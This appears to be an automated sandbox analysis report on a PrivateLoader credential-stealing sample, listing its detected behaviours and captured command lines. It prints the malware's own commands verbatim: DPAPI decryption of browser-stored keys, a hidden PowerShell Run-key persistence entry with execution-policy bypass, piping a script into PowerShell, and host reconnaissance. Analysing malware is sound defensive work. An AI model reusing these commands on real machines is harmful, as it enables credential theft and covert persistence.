Malware Analysis Report

2025-01-02 07:46

Sample ID 240509-sfljlsah62
Target stub.exe
SHA256 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
Tags
privateloader execution persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef

Threat Level: Known bad

The file stub.exe was found to be: Known bad.

Malicious Activity Summary

privateloader execution persistence spyware stealer

Privateloader family

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Adds Run key to start application

Looks up external IP address via web service

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Detects videocard installed

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Enumerates processes with tasklist

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 15:04

Signatures

Privateloader family

privateloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 15:04

Reported

2024-05-09 15:06

Platform

win7-20240220-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 15:04

Reported

2024-05-09 15:06

Platform

win10v2004-20240426-en

Max time kernel

136s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\curl.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cscript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\hKNCiITZVPAFxzH.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\stub.exe" C:\Windows\system32\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 400 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4484 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4484 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4484 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4484 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1656 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4176 wrote to memory of 3560 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4176 wrote to memory of 3560 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 400 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 1816 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1816 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 400 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 908 wrote to memory of 4680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 908 wrote to memory of 4680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 400 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3304 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4656 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 400 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2100 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 400 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4476 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 400 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1528 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3760 wrote to memory of 3348 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3760 wrote to memory of 3348 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2104 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2824 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2824 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 400 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4848 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4848 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 400 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\System32\Wbem\WMIC.exe
PID 400 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1948 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1948 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1976 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1976 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1948 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 1948 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CF9.tmp" "c:\Users\Admin\AppData\Local\Temp\olkgg0ws\CSCE254F21150E64C2A87A95ADCE1CA8C.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,92,189,224,153,149,154,254,15,90,25,191,67,109,35,188,255,47,151,9,21,172,109,172,152,78,250,241,191,140,181,162,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,235,215,220,194,5,197,88,53,204,186,212,66,146,226,188,79,204,39,241,55,33,198,3,57,197,104,32,254,164,222,53,48,0,0,0,190,0,161,123,65,14,46,171,239,38,157,125,28,95,192,236,16,13,130,184,221,191,110,38,80,70,146,60,47,32,10,203,90,20,66,70,106,81,223,50,206,68,184,16,75,136,60,134,64,0,0,0,70,232,28,94,65,45,27,44,230,217,177,254,232,17,18,175,206,168,72,136,197,118,127,130,242,66,19,188,10,231,102,228,166,149,101,103,226,180,241,31,220,52,111,182,118,173,9,121,124,121,42,179,127,86,97,46,106,209,100,22,161,216,139,82), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,92,189,224,153,149,154,254,15,90,25,191,67,109,35,188,255,47,151,9,21,172,109,172,152,78,250,241,191,140,181,162,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,235,215,220,194,5,197,88,53,204,186,212,66,146,226,188,79,204,39,241,55,33,198,3,57,197,104,32,254,164,222,53,48,0,0,0,190,0,161,123,65,14,46,171,239,38,157,125,28,95,192,236,16,13,130,184,221,191,110,38,80,70,146,60,47,32,10,203,90,20,66,70,106,81,223,50,206,68,184,16,75,136,60,134,64,0,0,0,70,232,28,94,65,45,27,44,230,217,177,254,232,17,18,175,206,168,72,136,197,118,127,130,242,66,19,188,10,231,102,228,166,149,101,103,226,180,241,31,220,52,111,182,118,173,9,121,124,121,42,179,127,86,97,46,106,209,100,22,161,216,139,82), $null, 'CurrentUser')

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,212,42,2,65,16,208,86,239,119,31,48,12,125,255,255,16,35,229,28,212,118,235,50,133,44,37,118,117,201,246,141,209,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,164,249,209,239,154,151,218,48,206,11,82,161,3,159,9,224,155,252,245,175,208,199,64,94,88,244,43,40,88,194,246,48,0,0,0,139,84,34,152,122,62,162,151,147,226,168,84,240,87,105,110,166,215,210,118,192,192,245,219,97,138,74,192,131,101,218,100,49,184,183,187,125,119,185,182,32,14,67,163,25,109,208,13,64,0,0,0,227,205,221,78,197,37,10,166,0,128,167,243,193,236,123,89,55,116,6,215,52,123,147,52,72,250,198,255,30,6,10,45,139,195,88,251,172,7,9,40,196,46,34,184,241,154,11,218,245,73,126,185,94,212,164,210,43,132,173,66,17,12,245,143), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,167,165,23,108,64,42,78,189,79,209,36,15,157,160,224,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,212,42,2,65,16,208,86,239,119,31,48,12,125,255,255,16,35,229,28,212,118,235,50,133,44,37,118,117,201,246,141,209,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,164,249,209,239,154,151,218,48,206,11,82,161,3,159,9,224,155,252,245,175,208,199,64,94,88,244,43,40,88,194,246,48,0,0,0,139,84,34,152,122,62,162,151,147,226,168,84,240,87,105,110,166,215,210,118,192,192,245,219,97,138,74,192,131,101,218,100,49,184,183,187,125,119,185,182,32,14,67,163,25,109,208,13,64,0,0,0,227,205,221,78,197,37,10,166,0,128,167,243,193,236,123,89,55,116,6,215,52,123,147,52,72,250,198,255,30,6,10,45,139,195,88,251,172,7,9,40,196,46,34,184,241,154,11,218,245,73,126,185,94,212,164,210,43,132,173,66,17,12,245,143), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

